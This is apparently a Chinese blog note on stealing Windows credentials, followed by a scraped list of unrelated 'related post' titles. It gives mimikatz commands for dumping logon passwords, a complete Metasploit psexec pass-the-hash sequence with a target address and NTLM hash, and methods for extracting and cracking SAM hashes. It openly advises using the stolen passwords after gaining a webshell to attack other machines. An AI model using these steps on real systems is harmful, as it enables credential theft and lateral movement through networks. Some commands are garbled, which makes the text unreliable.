1.、直接通过mimikatz读取管理员密码  :可以在cs里面找到这个工具,但是它只能读操作系统的密码。lazagne工具可以读所有密码(浏览器、操作系统、邮件系统的密码)。

找到.exe文件,然后放到c盘目录下:

第一条:privilege::debug   //提升权限

第二条:sekurlsa::logonpa ssWords  //抓取密码

2.本地hash远程攻击:只能在低版本的kali机上才能成功。在解密不了的情况下使用这种方法。hash值是可以直接进行登陆的,也就是说没有明文密码也可以进行登陆。

hash值的获取:1.在msf里面可以获取到。2.通过专业工具获取:以下是专业工具。需要将工具复制到虚拟机里面。

利用Hash远程登录系统    主要通过MSF提供的exploit/windows/smb/psexec 模块来完成。

msf >use exploit/windows/smb/psexec msf >set RHOST 192.168.1.109 msf >set SMBUser administrator msf >set SMBPass 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4 msf >exploit msf >shell

本地hash暴力破解:

1.通过LC5暴力破解Hash密码     使用gmer直接提权SAM和system文件或用Pwdump7提取hash,最后使用LC5破解。

2、使用Ophcrack破解系统Hash密码 http://simeon.blog.51cto.com/18680/122160

需要将需要暴力破解的sam 、system.config两个文件复制到kali机内,对sam进行暴力破解,用到的工具是Ophcrack

注意:

1.在我们获得webshell后首先通过这些工具获取到操作系统密码。通过获得的密码攻击其他机器。

windows密码安全性测试相关推荐

  1. WEB安全性测试测试用例(基础).doc

    原文地址为: WEB安全性测试测试用例(基础).doc 建立整体的威胁模型,测试溢出漏洞.信息泄漏.错误处理.SQL注入.身份验证和授权错误. 1.输入验证 客户端验证服务器端验证(禁用脚本调试,禁用 ...

  2. xmpp 服务器配置 open fire for windows 及 spark 测试

    xmpp 服务器配置 open fire for windows 此文章为 XMPP windows服务器配置,使用的是 open fire 3.9.1.exe 1: 下载 open fire ope ...

  3. 江西省省赛中职网络安全-Windows操作系统渗透测试

    9:Windows操作系统渗透测试 具体渗透方法观看视频即可 任务环境说明:  服务器场景:Server05  服务器场景操作系统:Windows(版本不详)(封闭靶机) 通过本地PC中渗透测试平 ...

  4. 计算机密码是空的怎么重置,电脑忘记开机登录密码怎么办? Windows 密码重置 - 合一学院...

    [ 电脑忘记开机登录密码怎么办 ] 电脑很久没有用或者是刚设置好开机密码都很容易忘记,有些时候还会间歇性失忆会突然忘记密码,遇到这种情况重装系统又太麻烦,今天就就教大家怎样重置电脑的密码. 测试的系统 ...

  5. APP测试之安全性测试

    一.前言 在SDK最近的项目中上线的包被第三方杀毒软件报出有病毒的问题,后来经过查验发现是SDK悬浮窗动画的逻辑被检验出有病毒,最后进行了修改.事情虽然解决了,但是引起该问题的一个原因是在测试中没有安 ...

  6. 软件测试-------Web(性能测试 / 界面测试 / 兼容性测试 / 安全性测试)

    Web(性能测试 / 界面测试 / 兼容性测试 / 安全性测试) 一.Web性能测试:(压力测试.负载测试.连接速度测试) 1.压力测试:      并发测试 (如500人同时登录邮箱) 2.负载测试 ...

  7. 软件测试·系统测试·安全性测试

    软件测试主要是为了测试发现软件系统中的BUG,并进行改正,以保证在软件交付给客户是能够保证客户需求达到实现.但在交付之后,并不意味着软件就不会再出现错误,哪怕软件的运行BUG已经完全被解决,而病毒及非 ...

  8. 安全性测试应该从那几个方面进行?

    软件的安全性应从哪几个方面去测试? 软件安全性测试包括程序.数据库安全性测试.根据系统安全指标不同测试策略也不同. 用户认证安全的测试要考虑问题: 明确区分系统中不同用户权限 . 系统中会不会出现用户 ...

  9. Windows端 USBIP测试

    Windows端 USBIP测试 注:-- 写在前面: 其实USBIP最开始的时候只是用在Linux端的, 具体是如下: Windows端只可以作为客户端, 不可以做为服务端 Linux端既可以作为客 ...

最新文章

  1. 关于(++i)+(++i)+(++i)与(++i)+(i++)与(i++)+(++i)
  2. 自带中心调整的电单车模型-DongGuan BDS
  3. AndroidStudio导入项目一直卡在Building gradle project info最快速解决方案
  4. SQL笛卡尔积结合前后行数据的统计案例
  5. AD域策略启动关机脚本不执行的注意事项
  6. 读书笔记 effective c++ Item 41 理解隐式接口和编译期多态
  7. s信网页版rver定时任务mysql_DataX Web2.0发布,集成定时任务,支持分布式
  8. 以用户为中心的SNS站点数据库设计及实现
  9. 【bzoj1699/USACO2007】Balanced Lineup排队——RMQ问题
  10. Python数据结构与算法视频教程-王宁宁-专题视频课程
  11. 破解Photoshop CC
  12. 3.SPSS Modeler数据基本分析笔记
  13. 【Jmeter+ant+Jenkins自动化持续集成】
  14. java大小写金额转换_java将金额转化为大写金额
  15. 【小峰の题单】网络流经典题目
  16. fx5u 脉冲输出指令PLSY(DPLSY)4种写法
  17. C++:链表(初识链表)
  18. [非技术]-电话面试感想
  19. cephfs创建和删除pool
  20. 一个普通码农无法避免的时代碾压

热门文章

  1. 我的学习计划-2018
  2. 极速配置VScode C++运行环境
  3. 关于PSP-T082主板的鉴别方法细究
  4. 基于微信小程序的科普之家小程序-计算机毕业设计
  5. things 3 mac 破解版永久激活方法
  6. Linux设备驱动篇——[I2C设备驱动-1]
  7. 轻松学 dva(基础 + 进阶)(32 个视频)
  8. python 访问sas 逻辑库_SAS岩论 | 在Jupyter Notebook中使用SAS
  9. 雷达感应模组,自动播放讲解仪雷达应用,雷达传感器技术
  10. awk BEGIN、END 很明白也很明了